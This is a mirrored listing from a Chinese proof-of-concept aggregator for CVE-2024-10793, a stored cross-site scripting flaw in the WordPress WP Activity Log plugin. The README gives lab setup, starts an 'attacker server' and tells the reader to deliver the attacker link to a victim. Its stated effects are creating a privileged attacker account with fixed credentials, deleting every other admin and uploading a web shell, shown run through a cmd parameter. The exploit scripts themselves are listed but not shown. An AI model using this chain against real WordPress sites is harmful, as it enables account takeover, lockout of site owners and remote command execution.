POC详情: 893ea0d2cc185dbfd5425d2152cb19540c97b75d

来源
https://github.com/MAHajian/CVE-2024-10793
关联漏洞
标题: WordPress plugin WP Activity Log 跨站脚本漏洞 (CVE-2024-10793)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin WP Activity Log 5.2.1版本及之前版本存在跨站脚本漏洞,该漏洞源于通过user_id参数进行存储型跨站脚本。
介绍
# CVE-2024-10793 PoC


Set this lines to your `hosts` file:
```
127.0.0.1  goodcms.lab
127.0.0.1  attacker.com
```


Launch Wordpress using docker:
```shell
$ sudo systemctl start docker
$ sudo docker-compose up -d
```


Open http://goodcms.lab:2121 and do installation wordpress steps.
Install wp-security-audit-log.5.2.1 or older versions in wordpress.


Launch attacker server:
```shell
$ php -S 0:9091 -t ./exploit
```


Deliver http://attacker.com to victim & Bingo!

Exploit Impacts:
- Add privileged user.
- Change current admin profile
- Delete all admins except hacker :)
- Shell Upload
- Logout


![alt text](./images/PoC.png)


Account Takeover & Create Privileged User Poc:
Attacker credentials after exploit: { email: amin@attacker.com, username: amin, password: 123456 } (You can change from xpl.js code.)

Run Shell Command:
http://goodcms.lab:2121/wp-content/plugins/sogrid/shell.php?cmd=id

![alt text](./images/shell-PoC.png)
文件快照

 [4.0K]  /data/pocs/893ea0d2cc185dbfd5425d2152cb19540c97b75d
├── [2.1K]  docker-compose.yml
├── [4.0K]  exploit
│   ├── [1.5K]  index.php
│   ├── [1.4M]  shell.zip
│   └── [ 10K]  xpl.js
├── [4.0K]  images
│   ├── [187K]  PoC.png
│   └── [ 30K]  shell-PoC.png
├── [1.1K]  LICENSE
├── [ 450]  Makefile
├── [ 943]  README.md
├── [1.6K]  wp-auto-config.yml
└── [1.8M]  wp-security-audit-log.5.2.1.zip

2 directories, 11 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。